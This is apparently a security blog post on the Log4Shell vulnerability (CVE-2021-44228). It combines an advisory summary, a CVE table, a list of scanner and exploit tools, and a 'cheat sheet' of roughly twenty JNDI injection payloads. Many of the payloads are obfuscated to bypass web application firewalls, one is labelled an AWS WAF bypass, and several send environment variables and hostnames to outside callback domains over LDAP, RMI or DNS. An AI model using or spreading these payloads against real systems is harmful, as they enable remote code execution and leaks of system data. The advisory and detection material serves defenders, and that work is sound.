Log4j RCE 💣- Exploit - Advisory - Resource & Cheat Sheet

(CVE-2021-44228) Log4j RCE 0-day Details, Advisory & mitigation


On December 9, 2021, A critical remote code execution vulnerability impacting at least Apache Log4j 2 (versions 2.0 to 2.14.1) was recently announced by Apache. This vulnerability is designated by Mitre as CVE-2021-44228 with the highest severity rating of 10.0. The vulnerability is also known as Log4Shell or LogJam by security researchers. If exploited, this vulnerability allows adversaries to potentially take full control of the impacted system.

Log4j 2 is a commonly used open-source third-party Java logging library used in software applications and services.

How the attack works:

After the initial insertion of the jndi: string, a URI is followed to access the secondary payload which causes command execution.


The attacker would construct an initial jndi: insertion and include it in the User-Agent HTTP Header:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Now the vulnerable Log4j instance will make an LDAP query to the included URI. The LDAP server will then respond with directory information containing the secondary payload link:

Security Advisories / Bulletins          [ Total:218 ]

0-9

A

B

C

D

E

F

G

H

I

J

K

L

M

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

Big Thanks to @SwitHak for all the Advisory Maintenance. Apart from We kindly request to everyone, (Individual, team, Organisation, or Firm) comment down the link of Advisry or Resource (Tools/Scripts) that needs to be added


Apache Log4j RCE vulnerability is much bigger than what we think because Log4j is been used everywhere. In 2015, Java says that Java has over 10 million developers and running on 56 billion devices globally

Here is the brief details on the Log4Shell Vulnerability in Apache Log4j utility.

CVE severity CVSS Score Kind Fixed verion Reporter
CVE-2021-44228 Critical 10.0 RCE 2.15.0 ChenZhaojun of Alibaba Cloud Security Team
CVE-2021-45046 Critical 9.0 RCE 2.16.0 iCConsult Kai Mindermann
CVE-2021-45105 High 7.5 DoS 2.17.0 Hideki Okamoto of Akamai Technologies

Resources for Log4j Remote Code Execution Vulnerability Testing/Exploit

  • Log4j-detect - Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading.
  • log4shell-detector - Python-based scanner/detector for Log4Shell exploitation attempts.
  • Logout4Shell - One of the best tools to date. It is a “vaccine” for the Apache Log4Shell vulnerability (CVE-2021-44228).  Logout4Shell exploits the vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled - this effectively blocks any further attempt to exploit Log4Shell on this serverKudos to Cybereason
  • Log4j2Scan - a Burp Suite Extension written in JAVA which could be useful as scan log4j2rce.
  • BurpLog4j2Scan - Another BurpSuite passive scanning plug-ins for Log4j2 RCE.
  • BurpShiroPassiveScan - BurpShiroPassiveScan is a scanning plug-in that hopefully saves some penetration time for watering.
  • Log4j2Scan - Log4j2 remote code executes vulnerabilities, BurpSuite passive scanning plug-ins.
  • Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent
  • Log4j2Scan - Log4j2 remote code executes vulnerabilities, BurpSuite passive scanning plug-ins.
  • log4j-scan - A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts.
  • Pachine - Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation).

We are adding more...!!! Please Comment down if you have any.

Log4j RCE Cheat Sheet

 
${jndi:ldap://${env:user}.uedo81.dnslog.cn/exp}

${jndi:dns://${hostName}.uedo81.dnslog.cn/a}
${jndi:dns://${env:COMPUTERNAME}.uedo81.dnslog.cn/a}
${jndi:dns://${env:USERDOMAIN}.qnfw43.dnslog.cn/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://dslepf.dnslog.cn/tem}
${${lower:jndi}:${lower:rmi}://dslepf.dnslog.cn/tem}
${jndi:ldap://dslepf.dnslog.cn/exp}
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass}
${${::-j}ndi:rmi://127.0.0.1:1389/ass}
${jndi:rmi://a.b.c}
${${lower:jndi}:${lower:rmi}://q.w.e/poc}
${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} (AWS WAF bypass)

We are adding more...!!! Please Comment down if you have any.

Once again, we request to everyone, (Individual, team, Organisation, or Firm) comment down the link of Advisory, Resource (Tools/Scripts), that needs to be added or Cheat Sheet that bypass WAF filters. Image: fastly.com

Post a Comment